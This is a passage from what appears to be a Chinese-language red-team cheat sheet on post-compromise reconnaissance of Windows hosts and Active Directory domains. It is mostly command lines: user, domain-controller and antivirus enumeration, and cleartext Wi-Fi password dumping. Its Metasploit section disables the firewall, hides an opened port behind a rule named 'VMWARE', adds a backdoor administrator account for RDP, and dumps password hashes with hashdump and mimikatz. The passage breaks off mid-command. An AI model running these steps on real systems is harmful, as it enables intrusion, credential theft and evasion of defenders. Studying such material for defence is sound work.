#\u67e5\u770b\u672c\u673a\u7528\u6237\u5217\u8868\nnet user\n\n#\u83b7\u53d6\u672c\u5730\u7ba1\u7406\u5458\u4fe1\u606f\nnet localgroup administrators\n\n#\u67e5\u770b\u5f53\u524d\u5728\u7ebf\u7528\u6237\nquser\nquery user\nquery user || qwinsta\n\n#\u67e5\u770b\u5f53\u524d\u7528\u6237\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u5177\u4f53\u6743\u9650\nwhoami \/all\n\n#\u67e5\u770b\u5f53\u524d\u6743\u9650\nwhoami && whoami \/priv\n\n#\u67e5\u5f53\u524d\u673a\u5668\u4e2d\u6240\u6709\u7684\u7ec4\u540d,\u4e86\u89e3\u4e0d\u540c\u7ec4\u7684\u804c\u80fd,\u5982,IT,HR,ADMIN,FILE\nnet localgroup\n<\/code><\/pre>\n\u6ce8\u610f\uff1a\u5982\u679c\u5728msf\u4e2d\u51fa\u73b0\u4e71\u7801
\n
![\"Pasted](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u4f7f\u7528\u547d\u4ee4\uff1a<\/p>\n
chcp 65001\n<\/code><\/pre>\n<\/div><\/p>\n2.\u7cfb\u7edf\u4fe1\u606f<\/h2>\n#\u67e5\u8be2\u7f51\u7edc\u914d\u7f6e\u4fe1\u606f\u3002\u8fdb\u884cIP\u5730\u5740\u6bb5\u4fe1\u606f\u6536\u96c6\nipconfig \/all\n\n#\u67e5\u8be2\u64cd\u4f5c\u7cfb\u7edf\u53ca\u8f6f\u4ef6\u4fe1\u606f\nsysteminfo \/fo list\nsysteminfo | findstr \"\u4e3b\u673a\u540d\"\nsysteminfo | findstr \/B \/C:\"OS Name\" \/C:\"OS Version\"\nsysteminfo | findstr \/B \/C:\"OS \u540d\u79f0\" \/C:\"OS \u7248\u672c\"\n\n#\u67e5\u770b\u5f53\u524d\u7cfb\u7edf\u7248\u672c\nver\nwmic os list brief\nwmic os get Caption,CSDVersion,OSArchitecture,Version\n\nwmic \/? #\/?\u7c7b\u4f3c\u4e8e-h\n\n#\u67e5\u770b\u7cfb\u7edf\u4f53\u7cfb\u7ed3\u6784\necho %PROCESSOR_ARCHITECTURE%\n\n#\u67e5\u8be2\u672c\u673a\u670d\u52a1\u4fe1\u606f\nwmic service list brief\n\n#\u67e5\u770b\u5b89\u88c5\u7684\u8f6f\u4ef6\u7684\u7248\u672c\u3001\u8def\u5f84\u7b49\nwmic product get name, version\npowershell \"Get-WmiObject -class Win32_Product |Select-Object -Property name, version\"\n\n#\u67e5\u8be2\u8fdb\u7a0b\u4fe1\u606f\ntasklist\nwmic process list brief\n\n#\u67e5\u770b\u542f\u52a8\u7a0b\u5e8f\u4fe1\u606f\nwmic startup get command,caption \n\n#\u67e5\u770b\u8ba1\u5212\u4efb\u52a1\n#win2000\u4e4b\u524d\u4f7f\u7528at\nat\n#win2000\u4e4b\u540e\u4f7f\u7528schtasks\nschtasks \/query \/fo LIST \/v\uff08win10\uff09\n#PS\uff1a\u5982\u679c\u9047\u5230\u8d44\u6e90\u65e0\u6cd5\u52a0\u8f7d\u95ee\u9898\uff0c\u5219\u662f\u7531\u4e8e\u5f53\u524d\u6d3b\u52a8\u9875\u7801\u6240\u81f4\uff1a\u66f4\u6539\u6d3b\u52a8\u9875\u7801\u4e3a437\uff1achcp 437\n\n#\u67e5\u770b\u4e3b\u673a\u5f00\u673a\u65f6\u95f4\nnet statistics workstation\n\n#\u5217\u51fa\u6216\u65ad\u5f00\u672c\u5730\u8ba1\u7b97\u673a\u4e0e\u6240\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u7684\u5bf9\u8bdd\nnet session\n\n#\u67e5\u770b\u672c\u5730\u53ef\u7528\u51ed\u636e\ncmdkey \/l\n\n#\u67e5\u770b\u8865\u4e01\u5217\u8868\nwmic qfe get hotfixid\nsysteminfo | findstr \"KB\"\n\n#\u67e5\u770b\u8865\u4e01\u7684\u540d\u79f0\u3001\u63cf\u8ff0\u3001ID\u3001\u5b89\u88c5\u65f6\u95f4\u7b49\nwmic qfe get Caption,Description,HotFixID,InstalledOn\n\n#\u67e5\u770b\u672c\u5730\u5bc6\u7801\u7b56\u7565\nnet accounts\n\n#\u67e5\u770bhosts\u6587\u4ef6\nWindows\uff1a\ntype c:\\Windows\\system32\\drivers\\etc\\hosts\n\n#\u67e5\u770bdns\u7f13\u5b58\nipconfig \/displaydns\n<\/code><\/pre>\n3.\u7f51\u7edc\u4fe1\u606f<\/h2>\n#\u67e5\u770b\u672c\u673a\u6240\u6709\u7684tcp,udp\u7aef\u53e3\u8fde\u63a5\u53ca\u5176\u5bf9\u5e94\u7684pid\nnetstat -ano\n\n#\u67e5\u770b\u672c\u673a\u6240\u6709\u7684tcp,udp\u7aef\u53e3\u8fde\u63a5,pid\u53ca\u5176\u5bf9\u5e94\u7684\u53d1\u8d77\u7a0b\u5e8f\uff0c\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\nnetstat -anob\n\n#\u67e5\u770b\u8def\u7531\u8868\u548carp\u7f13\u5b58\nroute print\narp -a\n\n#\u67e5\u770b\u672c\u673a\u5171\u4eab\u5217\u8868\u548c\u53ef\u8bbf\u95ee\u7684\u57df\u5171\u4eab\u5217\u8868 \uff08445\u7aef\u53e3\uff09\nnet share\nwmic share get name,path,status\n<\/code><\/pre>\n4.\u9632\u706b\u5899\u4fe1\u606f<\/h2>\n#\u67e5\u770b\u9632\u706b\u5899\u914d\u7f6e(netsh\u547d\u4ee4\u4e5f\u53ef\u4ee5\u7528\u4f5c\u7aef\u53e3\u8f6c\u53d1)\nnetsh firewall show config\nnetsh advfirewall show allprofiles\npowershell get-netfirewallrule\n\n#\u5173\u95ed\u9632\u706b\u5899(Windows Server 2003 \u4ee5\u524d\u7684\u7248\u672c)\nnetsh firewall set opmode disable \n\n#firewall\u547d\u4ee4\u5df2\u5f03\u7528\uff0c\u5efa\u8bae\u4f7f\u7528advfirewall\u547d\u4ee4\n#\u67e5\u770b\u914d\u7f6e\u89c4\u5219\nnetsh advfirewall firewall show rule name=all\n\n#\u5173\u95ed\u9632\u706b\u5899\\\u5f00\u542f\u9632\u706b\u5899(Windows Server 2003 \u4ee5\u540e\u7684\u7248\u672c)\nnetsh advfirewall set allprofiles state off\\on\n\n#\u5bfc\u51fa\\\u5bfc\u5165\u914d\u7f6e\u6587\u4ef6\nnetsh advfirewall export\\import xx.pol\n\n#\u65b0\u5efa\u89c4\u5219\u963b\u6b62TCP\u534f\u8bae139\u7aef\u53e3\nnetsh advfirewall firewall add rule name=\"deny tcp 139\" dir=in protocol=tcp localport=139 action=block\n\n#\u65b0\u5efa\u89c4\u5219\u5141\u8bb83389\u901a\u8fc7\u9632\u706b\u5899\nnetsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow\n\n#\u5220\u9664\u540d\u4e3aRemote Desktop\u7684\u89c4\u5219\nnetsh advfirewall firewall delete rule name=Remote Desktop\n<\/code><\/pre>\n5.RDP\u8fdc\u7a0b\u684c\u9762<\/h2>\n#\u5f00\u542fRDP\nwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\n\n#\u5173\u95edRDP\nwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0\n\n#\u67e5\u8be2\u5e76\u5f00\u542fRDP\u670d\u52a1\u7684\u7aef\u53e3\uff0c\u8fd4\u56de\u4e00\u4e2a\u5341\u516d\u8fdb\u5236\u7684\u7aef\u53e3\nREG QUERY \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/V PortNumber\n<\/code><\/pre>\n6.\u83b7\u53d6\u6740\u8f6f\u4fe1\u606f<\/h2>\n\n- \u83b7\u53d6\u6740\u8f6f\u540d<\/li>\n<\/ul>\n
WMIC \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List\n<\/code><\/pre>\n\n- \u83b7\u53d6\u6740\u8f6f\u540d\u548c\u5b89\u88c5\u8def\u5f84<\/li>\n<\/ul>\n
WMIC \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe\n<\/code><\/pre>\n\n- \u5e38\u89c1\u7684\u6740\u6bd2\u8f6f\u4ef6\u8fdb\u7a0b<\/li>\n<\/ul>\n
tasklist \/v\n\nwmic process list brief\n<\/code><\/pre>\n\n\n\n\u8fdb\u7a0b<\/th>\n \u8f6f\u4ef6\u540d\u79f0<\/th>\n<\/tr>\n<\/thead>\n \n\n360SD.exe<\/td>\n 360\u6740\u6bd2<\/td>\n<\/tr>\n \n360TRAY.exe<\/td>\n 360\u5b9e\u65f6\u4fdd\u62a4<\/td>\n<\/tr>\n \nHipsMain.exe<\/td>\n \u706b\u7ed2<\/td>\n<\/tr>\n \nZHUDONGFANGYU.exe<\/td>\n 360s\u4e3b\u52a8\u9632\u5fa1<\/td>\n<\/tr>\n \nKSAFETRAY.exe<\/td>\n \u91d1\u5c71\u536b\u58eb<\/td>\n<\/tr>\n \nSAFEDOGUPDATECENTER.exe<\/td>\n \u670d\u52a1\u5668\u5b89\u5168\u72d7<\/td>\n<\/tr>\n \nMCAFEEMCSHIELD.exe<\/td>\n MCAFEE<\/td>\n<\/tr>\n \nEGULEXE<\/td>\n NoD32<\/td>\n<\/tr>\n \nAVP.exe<\/td>\n \u5361\u5df4\u65af\u57fa<\/td>\n<\/tr>\n \nAVGUARD.exe<\/td>\n \u5c0f\u7ea2\u4f1e<\/td>\n<\/tr>\n \nBDAGENT.exe<\/td>\n BITDEFENDER<\/td>\n<\/tr>\n \nQQPCRTP.exe<\/td>\n QQ\u7535\u8111\u7ba1\u5bb6<\/td>\n<\/tr>\n \nhids<\/td>\n \u4e3b\u673a\u9632\u62a4\u7c7b\u4ea7\u54c1<\/td>\n<\/tr>\n \nhws*<\/td>\n \u62a4\u536b\u795e<\/td>\n<\/tr>\n \nyunsuo*<\/td>\n \u4e91\u9501<\/td>\n<\/tr>\n \nD_Safe*<\/td>\n D\u76fe<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n7.\u4ee3\u7406\u4fe1\u606f<\/h2>\nREG QUERY \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" \/v ProxyServer\n\n#\u901a\u8fc7pac\u6587\u4ef6\u81ea\u52a8\u4ee3\u7406\u60c5\u51b5\nREG QUERY \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" \/v AutoConfigURL\n<\/code><\/pre>\n8.Wifi\u5bc6\u7801<\/h2>\n\n- \u663e\u793a\u6240\u6709\u65e0\u7ebf\u7f51\u7edc\u914d\u7f6e\u6587\u4ef6<\/li>\n<\/ul>\n
netsh wlan show profile\n<\/code><\/pre>\n\n- \u663e\u793a\u7279\u5b9a\u65e0\u7ebf\u7f51\u7edc\u7684\u5bc6\u7801\uff08\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\uff09<\/li>\n<\/ul>\n
netsh wlan show profile name=\"HUAWEI-MINGY\" key=clear\n<\/code><\/pre>\n<\/div><\/p>\n\n- \u4e00\u6761\u547d\u4ee4\u83b7\u53d6\u8fde\u63a5\u8fc7\u7684 wifi \u5bc6\u7801\uff0c\u4f01\u4e1a\u8ba4\u8bc1\u7684\u83b7\u53d6\u4e0d\u5230<\/li>\n<\/ul>\n
for \/f \"skip=9 tokens=1,2 delims=:\" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear\n<\/code><\/pre>\n9.\u56de\u6536\u7ad9\u4fe1\u606f<\/h2>\n\n- \u904d\u5386\u5f53\u524d\u7cfb\u7edf\u4e2d\u7684\u6240\u6709\u7528\u6237\u8d26\u6237\uff0c\u5e76\u5c06\u6bcf\u4e2a\u7528\u6237\u7684\u56de\u6536\u7ad9\u4e2d\u7684\u6587\u4ef6\u5217\u8868\u5bfc\u51fa\u5230\u6587\u672c\u6587\u4ef6\u4e2d<\/li>\n<\/ul>\n
FOR \/f \"skip=1 tokens=1,2 delims= \" %c in ('wmic useraccount get name^,sid') do dir \/a \/b C:\\$Recycle.Bin\\%d\\ ^>%c.txt\n<\/code><\/pre>\n\n- \u76ee\u5f55\u8def\u5f84\u5728
C:\\$Recycle.Bin<\/code><\/li>\n<\/ul>\n$I \u5f00\u5934\u7684\u6587\u4ef6\u4fdd\u5b58\u7684\u662f\u8def\u5f84\u4fe1\u606f\n$R \u5f00\u5934\u7684\u6587\u4ef6\u4fdd\u5b58\u7684\u662f\u6587\u4ef6\u5185\u5bb9\n<\/code><\/pre>\n10.WMIC\u6536\u96c6\u4fe1\u606f<\/h2>\n:: BIOS\u4fe1\u606f\nwmic BIOS list full \/format:htable > wmic.html\n:: CPU\u4fe1\u606f\nwmic CPU list full \/format:htable >> wmic.html\n:: \u542f\u52a8\u914d\u7f6e\u7ba1\u7406\nwmic BOOTCONFIG list full \/format:htable >> wmic.html\n:: \u7cfb\u7edf\u73af\u5883\u7ba1\u7406\nwmic ENVIRONMENT list \/format:htable >> wmic.html\n:: \u7cfb\u7edf\u5e10\u6237\u7ba1\u7406\nwmic SYSACCOUNT list full \/format:htable >> wmic.html\n:: \u5171\u4eab\u8d44\u6e90\u7ba1\u7406\nwmic SHARE list full \/format:htable >> wmic.html\n:: \u8fdb\u7a0b\nwmic PROCESS get CSName,Description,ExecutablePath,ProcessId \/format:htable >> wmic.html\n:: \u670d\u52a1\nwmic SERVICE get Caption,Name,PathName,ServiceType,Started,StartMode,StartName \/format:htable >> wmic.html\n:: \u7528\u6237\u5e10\u53f7\nwmic USERACCOUNT list full \/format:htable >> wmic.html\n:: \u7528\u6237\u7ec4\nwmic GROUP list \/format:htable >> wmic.html\n:: \u7f51\u7edc\u63a5\u53e3\nwmic NICCONFIG where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress \/format:htable >> wmic.html\n:: \u786c\u76d8\u4fe1\u606f\nwmic VOLUME get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace \/format:htable >> wmic.html\n:: \u7f51\u7edc\u5171\u4eab\u4fe1\u606f\nwmic NETUSE list full \/format:htable >> wmic.html\n:: \u5b89\u88c5\u7684Windows\u8865\u4e01\nwmic qfe get Caption,Description,HotFixID,InstalledOn \/format:htable >> wmic.html\n:: \u542f\u52a8\u8fd0\u884c\u7a0b\u5e8f\nwmic STARTUP get Caption,Command,Location,User \/format:htable >> wmic.html\n:: \u5b89\u88c5\u7684\u8f6f\u4ef6\u5217\u8868\nwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version \/format:htable >> wmic.html\n:: \u64cd\u4f5c\u7cfb\u7edf\nwmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,ServicePackMinorVersion,SystemDirectory \/format:htable >> wmic.html\n:: \u65f6\u533a\u4fe1\u606f\nwmic Timezone get DaylightName,Description,StandardName \/format:htable >> wmic.html\n<\/code><\/pre>\n11.Powershell\u6536\u96c6\u4fe1\u606f<\/h2>\n
\u4f7f\u7528PowerSploit<\/p>\n
\u4e8c\u3001\u57df\u5185\u4fe1\u606f\u6536\u96c6<\/h1>\n1.Net<\/h2>\n#\u67e5\u8be2\u57df\nnet view \/domain\n\n#\u67e5\u8be2\u57df\u5185\u7684\u6240\u6709\u8ba1\u7b97\u673a\nnet view \/domain:mingy\n\n#\u67e5\u8be2\u57df\u5185\u6240\u6709\u7528\u6237\u7ec4 \uff08Enterprise Admins \u7ec4\u6743\u9650\u6700\u5927\uff09\nnet group \/domain\n\n#\u67e5\u770b\u57df\u7ba1\u7406\u5458\u7684\u7528\u6237\u7ec4\nnet group \"domain admins\" \/domain\n\n#\u67e5\u8be2\u6240\u6709\u57df\u6210\u5458\u8ba1\u7b97\u673a\u5217\u8868\nnet group \"domain computers\" \/domain\n\n#\u67e5\u8be2\u57df\u7cfb\u7edf\u7ba1\u7406\u5458\u7528\u6237\u7ec4\nnet group \"Enterprise admins\" \/domain\n\n#\u67e5\u770b\u57df\u63a7\u5236\u5668\nnet group \"domain controllers\" \/domain\n\n#\u5bf9\u6bd4\u67e5\u770b \"\u5de5\u4f5c\u7ad9\u57df DNS \u540d\u79f0(\u57df\u540d)\"\u548c\"\u767b\u5f55\u57df()\u57df\u63a7\u5236\u5668\"\u7684\u4fe1\u606f\u662f\u5426\u76f8\u5339\u914d\nnet config workstation\n\n#\u67e5\u770b\u57df\u5185\u6240\u6709\u8d26\u53f7\nnet user \/domain\n\n#\u67e5\u8be2\u6307\u5b9a\u7528\u6237\u7684\u8be6\u60c5\u4fe1\u606f\nnet user xxx \/domain\n\n#\u67e5\u770b\u65f6\u95f4\u53ef\u4ee5\u627e\u5230\u57df\u63a7\nnet time \/domain\n\n#\u67e5\u770b\u57df\u5bc6\u7801\u7b56\u7565\nnet accounts \/domain\n\n#\u67e5\u770b\u5f53\u524d\u767b\u5f55\u57df\nnet config workstation\n\n#\u767b\u5f55\u672c\u673a\u7684\u57df\u7ba1\u7406\u5458\nnet localgroup administrators \/domain\n<\/code><\/pre>\n2.Dsquery<\/h2>\n
dsquery \u662f\u4e00\u4e2a Windows \u547d\u4ee4\u884c\u5de5\u5177\uff0c\u5b83\u662f Active Directory \u670d\u52a1\u7684\u4e00\u90e8\u5206\uff0c\u7528\u4e8e\u67e5\u8be2 Active Directory \u76ee\u5f55\u670d\u52a1\u3002\u8fd9\u4e2a\u5de5\u5177\u53ef\u4ee5\u5e2e\u52a9\u7cfb\u7edf\u7ba1\u7406\u5458\u548cIT\u4e13\u4e1a\u4eba\u5458\u68c0\u7d22\u6709\u5173\u76ee\u5f55\u5bf9\u8c61\u7684\u4fe1\u606f\uff0c\u4f8b\u5982\u7528\u6237\u3001\u7ec4\u3001\u8ba1\u7b97\u673a\u548cOU\uff08\u7ec4\u7ec7\u5355\u4f4d\uff09\u3002<\/p>\n
#\u67e5\u770b\u5f53\u524d\u57df\u5185\u7684\u6240\u6709\u673a\u5668 ,dsquery \u5de5\u5177\u4e00\u822c\u5728\u57df\u63a7\u4e0a\u624d\u6709,\u4e0d\u8fc7\u4f60\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2adsquery\ndsquery computer\n\n#\u67e5\u770b\u5f53\u524d\u57df\u4e2d\u7684\u6240\u6709\u8d26\u6237\u540d\ndsquery user\n\n#\u67e5\u627e\u5177\u6709\u7279\u5b9a\u901a\u7528\u540d\u79f0\uff08Common Name, CN\uff09\u7684\u7528\u6237\ndsquery user -limit 0 \"cn=\u7528\u6237\u540d\"\n\n#\u67e5\u770b\u5f53\u524d\u57df\u5185\u7684\u6240\u6709\u7ec4\u540d\ndsquery group\n\n#\u67e5\u770b\u6240\u6709\u7ec4\u7ec7\u5355\u4f4d\ndsquery ou\n\n#\u67e5\u770b\u5230\u5f53\u524d\u57df\u6240\u5728\u7684\u7f51\u6bb5 \uff0c\u7ed3\u5408 nbtscan \u4f7f\u7528\ndsquery subnet\n\n#\u67e5\u770b\u57df\u5185\u6240\u6709\u7684web\u7ad9\u70b9\ndsquery site\n\n#\u67e5\u770b\u6240\u6709\u57df\u63a7\u5236\u5668\ndsquery server\n\n#\u67e5\u8be2\u524d240\u4e2a\u4ee5admin\u5f00\u5934\u7684\u7528\u6237\u540d\ndsquery user domainroot -name admin* -limit 240\n<\/code><\/pre>\n3.Other<\/h2>\n# \u67e5\u770b\u57df\u63a7\u5236\u5668\u7684\u673a\u5668\u540d\n# nltest \u662f\u4e00\u4e2a\u7528\u4e8e\u8bca\u65ad\u57df\u4fe1\u4efb\u548c\u4fe1\u4efb\u5173\u7cfb\u7684\u547d\u4ee4\u884c\u5de5\u5177\u3002\nnltest \/DCLIST:MINGY\n\n# \u67e5\u770b\u57df\u5185\u7684\u4e3b\u57df\u63a7\u5236\u5668\uff08\u4ec5\u9650Windows Server 2008\u53ca\u4e4b\u540e\u7cfb\u7edf\uff09\n# netdom \u662f\u4e00\u4e2a\u7528\u4e8e\u7ba1\u7406\u57df\u4fe1\u4efb\u548c\u8ba1\u7b97\u673a\u8d26\u6237\u7684\u547d\u4ee4\u884c\u5de5\u5177\u3002\nnetdom query pdc\n\n# \u67e5\u770b\u57df\u63a7\u4e3b\u673a\u540d\uff0c\u5217\u51fa\u6240\u6709\u914d\u7f6e\u4e3aLDAP\u670d\u52a1\u7684\u670d\u52a1\u5668\n# nslookup \u662f\u4e00\u4e2a\u7528\u4e8e\u67e5\u8be2DNS\u8bb0\u5f55\u7684\u547d\u4ee4\u884c\u5de5\u5177\u3002\n# -type=srv \u53c2\u6570\u6307\u5b9a\u67e5\u8be2\u7c7b\u578b\u4e3a\u670d\u52a1\u8bb0\u5f55\uff08Service Record\uff09\n# _ldap._tcp \u662fLDAP\u670d\u52a1\u7684DNS\u670d\u52a1\u8bb0\u5f55\u6807\u8bc6\nnslookup -type=srv _ldap._tcp\n\n# \u67e5\u770b\u5f53\u524d\u57df\u4e0e\u5176\u4ed6\u57df\u7684\u4fe1\u4efb\u5173\u7cfb\u5217\u8868\nnltest \/domain_trusts\n\n# \u67e5\u770b\u57df\u5185\u90ae\u4ef6\u670d\u52a1\u5668\n# -q=mx \u53c2\u6570\u6307\u5b9a\u67e5\u8be2\u7c7b\u578b\u4e3a\u90ae\u4ef6\u4ea4\u6362\u8bb0\u5f55\uff08Mail Exchange Record\uff09\nnslookup -q=mx mingy.com\n\n# \u67e5\u770b\u57df\u5185DNS\u670d\u52a1\u5668\n# -q=ns \u53c2\u6570\u6307\u5b9a\u67e5\u8be2\u7c7b\u578b\u4e3a\u57df\u540d\u670d\u52a1\u5668\u8bb0\u5f55\uff08Name Server Record\uff09\u3002\nnslookup -q=ns mingy.com\n<\/code><\/pre>\n4.\u5b9a\u4f4d\u57df\u63a7<\/h2>\n\n- ipconfig
\n\u4f7f\u7528 ipconfig \u547d\u4ee4\u83b7\u53d6\u672c\u5730\u7f51\u7edc\u63a5\u53e3\u7684\u8be6\u7ec6\u4fe1\u606f\uff0c\u5305\u62ecDNS\u670d\u52a1\u5668\u5730\u5740<\/li>\n<\/ol>\nipconfig \/all\n<\/code><\/pre>\n\n- \u67e5\u8be2 dns \u89e3\u6790\u8bb0\u5f55<\/li>\n<\/ol>\n
\n- \u5229\u7528 nslookup \u5de5\u5177\u67e5\u8be2\u57df\u7684LDAP\u670d\u52a1\u8bb0\u5f55(SRV\u8bb0\u5f55)\uff0c\u4ee5\u8bc6\u522b\u57df\u63a7\u5236\u5668<\/li>\n
- \u6b64\u547d\u4ee4\u5c06\u8fd4\u56de\u57df\u63a7\u5236\u5668\u7684DNS\u8bb0\u5f55\uff0c\u5305\u62ec\u4f18\u5148\u7ea7\u3001\u6743\u91cd\u3001\u7aef\u53e3\u53f7\u548c\u76ee\u6807\u4e3b\u673a\u540d\u3002<\/li>\n<\/ul>\n
nslookup -type=all _ldap._tcp.dc._msdcs.mingy.com\n<\/code><\/pre>\n\n- \u670d\u52a1\u4e3b\u4f53\u540d\u79f0\uff08SPN\uff09\u67e5\u8be2<\/li>\n<\/ol>\n
\n- \u901a\u8fc7 setspn \u5de5\u5177\u67e5\u8be2\u6240\u6709\u670d\u52a1\u4e3b\u4f53\u540d\u79f0\uff0c\u4ee5\u8bc6\u522b\u57df\u63a7\u5236\u5668\u3002<\/li>\n<\/ul>\n
setspn -q *\/*\n<\/code><\/pre>\n\n- \u9488\u5bf9\u7279\u5b9a\u57df\u6267\u884cSPN\u67e5\u8be2\uff0c\u53ef\u4ee5\u8fc7\u6ee4\u51fa\u57df\u63a7\u5236\u5668\u76f8\u5173\u7684\u8bb0\u5f55\u3002<\/li>\n<\/ul>\n
setspn -T mingy.com -q *\/*\n<\/code><\/pre>\n\n- \u5728 SPN \u626b\u63cf\u7ed3\u679c\u4e2d\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u5185\u5bb9\uff0c\u6765\u8fdb\u884c\u57df\u63a7\u7684\u5b9a\u4f4d\u3002<\/li>\n<\/ul>\n
CN =DC,OU=Domain Controllers,DC=mingy,DC=com\n<\/code><\/pre>\n\n- net group<\/li>\n<\/ol>\n
\n- \u4f7f\u7528 net group \u547d\u4ee4\u67e5\u8be2\u57df\u63a7\u5236\u5668\u7ec4\uff0c\u76f4\u63a5\u5b9a\u4f4d\u57df\u63a7\u5236\u5668\u7684\u6210\u5458\u3002<\/li>\n<\/ul>\n
net group \"domain controllers\" \/domain\n<\/code><\/pre>\n\n- \u7aef\u53e3\u8bc6\u522b
\n\u8bc6\u522b\u57df\u63a7\u5236\u5668\u5f00\u653e\u7684\u7279\u5b9a\u7aef\u53e3<\/li>\n<\/ol>\n\n- \u7aef\u53e3\uff1a389<\/li>\n
- \u670d\u52a1\uff1aLDAP\u3001ILS<\/li>\n
- \u8bf4\u660e\uff1a\u8f7b\u578b\u76ee\u5f55\u8bbf\u95ee\u534f\u8bae\u548c NetMeeting Internet Locator Server \u5171\u7528\u8fd9\u4e00\u7aef\u53e3\u3002<\/li>\n
- \u7aef\u53e3\uff1a53<\/li>\n
- \u670d\u52a1\uff1aDomain Name Server\uff08DNS\uff09<\/li>\n
- \u8bf4\u660e\uff1a53 \u7aef\u53e3\u4e3a DNS(Domain Name Server\uff0c\u57df\u540d\u670d\u52a1\u5668)\u670d\u52a1\u5668\u6240\u5f00\u653e\u3002<\/li>\n<\/ul>\n
\u4e09\u3001Metasploit\u5185\u7f51\u4fe1\u606f\u6536\u96c6<\/h1>\n1.\u53cd\u5f39shell<\/h2>\n
\u5e94\u8be5\u77e5\u9053\u5982\u4f55\u505a<\/p>\n
2.\u5173\u95ed\u9632\u706b\u5899<\/h2>\n1\uff09meterpreter \u8fdb\u5165 shell \u6267\u884c\u5982\u4e0b\u547d\u4ee4<\/h3>\nnetsh advfirewall set allprofiles state off\nnetsh advfirewall show allprofiles\n<\/code><\/pre>\n2\uff09\u901a\u8fc7\u7b56\u7565\u6dfb\u52a0\u9632\u706b\u5899\u89c4\u5219\u9690\u853d\u884c\u4e3a<\/h3>\nnetsh advfirewall set add rule name=\"VMWARE\" protocol=TCP dir=in localport=5555 action=allow\n\nnetsh firewall add portopening TCP 5555 \"VMWARE\" ENABLE ALL\n<\/code><\/pre>\n3\uff09\u91cd\u542f\u7cfb\u7edf\uff0c\u6dfb\u52a0\u7684\u9632\u706b\u5899\u89c4\u5219\u624d\u4f1a\u751f\u6548<\/h3>\nshutdown -r -f -t 0\n<\/code><\/pre>\n3.\u6253\u5f003389\u5e76\u8fde\u63a5<\/h2>\n#\u5f00\u542f3389\u8fdc\u7a0b\u684c\u9762\nrun post\/windows\/manage\/enable_rdp\nrun getgui -e\n\n#\u53ef\u4ee5\u5229\u7528\u8be5\u547d\u4ee4 \uff0c\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6dfb\u52a0\u7528\u6237\nrun getgui -u admin -p admin\nnet localgroup administrators admin \/add\n\n#\u8fdc\u7a0b\u8fde\u63a5\u684c\u9762\nrdesktop -u username -p password ip\n\n#\u67e5\u770b\u8fdc\u7a0b\u684c\u9762\nscreenshot\nuse espia\nscreengrab\nscreenshare\n\n#\u5220\u9664\u6307\u5b9a\u8d26\u53f7\nrun post\/windows\/manage\/delete_user USERNAME=admin\n<\/code><\/pre>\n4.\u53e3\u4ee4\u7834\u89e3<\/h2>\n
\u7528\u4e8e\u4ece\u76ee\u6807 Windows \u7cfb\u7edf\u4e2d\u63d0\u53d6\u7528\u6237\u5bc6\u7801\u54c8\u5e0c\u503c\uff08NTLM hashes\uff09\u3002<\/p>\n
# \u5728system\u6743\u9650\u7684meterpreter\u4e2d\u6267\u884c\nuse post\/windows\/gather\/hashdump\nset session 1\nexploit\n# \u7ed3\u679c\u4fdd\u5b58\u5728tmp\u76ee\u5f55\u4e0b\n\nuse post\/windows\/gather\/smart_hashdump\nset session 1\nexploit\n\n#\u683c\u5f0f\n\u7528\u6237\u540d\u79f0 : RID : LM-HASH \u503c : NT-HASH \u503c\n<\/code><\/pre>\n#Hashdump\u4f7f\u7528\u7684\u662fmimikatz\u7684\u90e8\u5206\u529f\u80fd\nLoad mimikatz\n\n#wdigest \u3001kerberos \u3001msv \u3001ssp \u3001tspkg \u3001livessp\nmimikatz_command -h\nmimikatz_command -f a:: #\u67e5\u8be2\u6709\u54ea\u4e9b\u6a21\u5757\nmimikatz_command -f samdump::hashes\nmimikatz_command -f samdump::bootkey\n<\/code><\/pre>\n5.Other<\/h2>\n#\u786e\u5b9a\u76ee\u6807\u4e3b\u673a\u662f\u5426\u662f\u865a\u62df\u673a \uff1a\nrun post\/windows\/gather\/checkvm\n\n#\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u8f6f\u4ef6\u5b89\u88c5\u4fe1\u606f \uff1a\nrun post\/windows\/gather\/enum_applications\n\n#\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u6700\u8fd1\u8bbf\u95ee\u8fc7\u7684\u6587\u6863 \u3001\u94fe\u63a5\u4fe1\u606f\uff1a\nrun post\/windows\/gather\/dumplinks\n\n#\u67e5\u770b\u76ee\u6807\u73af\u5883\u4fe1\u606f\uff1a\nrun 